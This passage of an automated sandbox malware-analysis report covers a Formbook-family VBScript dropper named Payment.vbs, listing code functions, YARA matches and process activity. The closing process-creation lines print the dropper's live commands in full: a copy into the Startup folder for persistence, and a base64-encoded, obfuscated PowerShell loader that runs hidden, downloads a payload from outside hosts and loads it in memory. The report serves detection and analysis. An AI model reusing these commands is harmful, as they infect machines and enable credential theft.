Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACAAB3	17_2_03ACAAB3
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC416A	17_2_03AC416A
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC4173	17_2_03AC4173
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AE2EF3	17_2_03AE2EF3
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC25EB	17_2_03AC25EB
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC2413	17_2_03AC2413
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0368D34C	19_2_0368D34C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375A352	19_2_0375A352
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375132D	19_2_0375132D
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037603E6	19_2_037603E6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AE3F0	19_2_036AE3F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E739A	19_2_036E739A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03740274	19_2_03740274
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037412ED	19_2_037412ED
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BB2C0	19_2_036BB2C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A52A0	19_2_036A52A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D516C	19_2_036D516C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0368F172	19_2_0368F172
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0376B16B	19_2_0376B16B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03690100	19_2_03690100
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373A118	19_2_0373A118
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037581CC	19_2_037581CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AB1B0	19_2_036AB1B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037601AA	19_2_037601AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F0E0	19_2_0375F0E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037570E9	19_2_037570E9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A70C0	19_2_036A70C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374F0CC	19_2_0374F0CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0770	19_2_036A0770
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036C4750	19_2_036C4750
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369C7C0	19_2_0369C7C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F7B0	19_2_0375F7B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BC6E0	19_2_036BC6E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037516CC	19_2_037516CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757571	19_2_03757571
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0535	19_2_036A0535
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373D5B0	19_2_0373D5B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03760591	19_2_03760591
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03691460	19_2_03691460
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03752446	19_2_03752446
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F43F	19_2_0375F43F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374E4F6	19_2_0374E4F6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FB76	19_2_0375FB76
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375AB40	19_2_0375AB40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036DDBF9	19_2_036DDBF9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03756BD7	19_2_03756BD7
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BFB80	19_2_036BFB80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03713A6C	19_2_03713A6C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757A46	19_2_03757A46
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FA49	19_2_0375FA49
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374DAC6	19_2_0374DAC6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E5AA0	19_2_036E5AA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373DAAC	19_2_0373DAAC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369EA80	19_2_0369EA80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B6962	19_2_036B6962
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A9950	19_2_036A9950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BB950	19_2_036BB950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A29A0	19_2_036A29A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0376A9A6	19_2_0376A9A6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A2840	19_2_036A2840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AA840	19_2_036AA840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0370D800	19_2_0370D800
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A38E0	19_2_036A38E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036CE8F0	19_2_036CE8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036868B8	19_2_036868B8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03714F40	19_2_03714F40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E2F28	19_2_036E2F28
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036C0F30	19_2_036C0F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FF09	19_2_0375FF09
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036ACFE0	19_2_036ACFE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03692FC8	19_2_03692FC8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FFB1	19_2_0375FFB1
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A1F92	19_2_036A1F92
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0E59	19_2_036A0E59
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375EE26	19_2_0375EE26
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375EEDB	19_2_0375EEDB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A9EB0	19_2_036A9EB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375CE93	19_2_0375CE93
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B2E90	19_2_036B2E90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757D73	19_2_03757D73
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A3D40	19_2_036A3D40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03751D5A	19_2_03751D5A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AAD00	19_2_036AAD00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369ADE0	19_2_0369ADE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BFDC0	19_2_036BFDC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B8DBF	19_2_036B8DBF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03719C32	19_2_03719C32
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0C00	19_2_036A0C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FCF2	19_2_0375FCF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03690CF2	19_2_03690CF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03740CB5	19_2_03740CB5
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F02A	19_2_0356F02A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E358	19_2_0356E358
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356CB18	19_2_0356CB18
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03575304	19_2_03575304
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356CA7C	19_2_0356CA7C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356D878	19_2_0356D878
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E80C	19_2_0356E80C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E473	19_2_0356E473
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1E44D	24_2_04A1E44D
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A3ED55	24_2_04A3ED55
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1FFCC	24_2_04A1FFCC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1FFD5	24_2_04A1FFD5
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A28735	24_2_04A28735
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A25085	24_2_04A25085
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A201F5	24_2_04A201F5
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A26910	24_2_04A26910
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A26915	24_2_04A26915
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1E275	24_2_04A1E275

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 036D5130 appears 36 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0371F290 appears 105 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0368B970 appears 266 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 036E7E54 appears 89 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0370EA12 appears 84 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 03945130 appears 36 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 0397EA12 appears 86 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 03957E54 appears 96 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 0398F290 appears 105 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 038FB970 appears 268 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: Payment.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@20/12@3/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aftf20og.0ld.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')	Jump to behavior
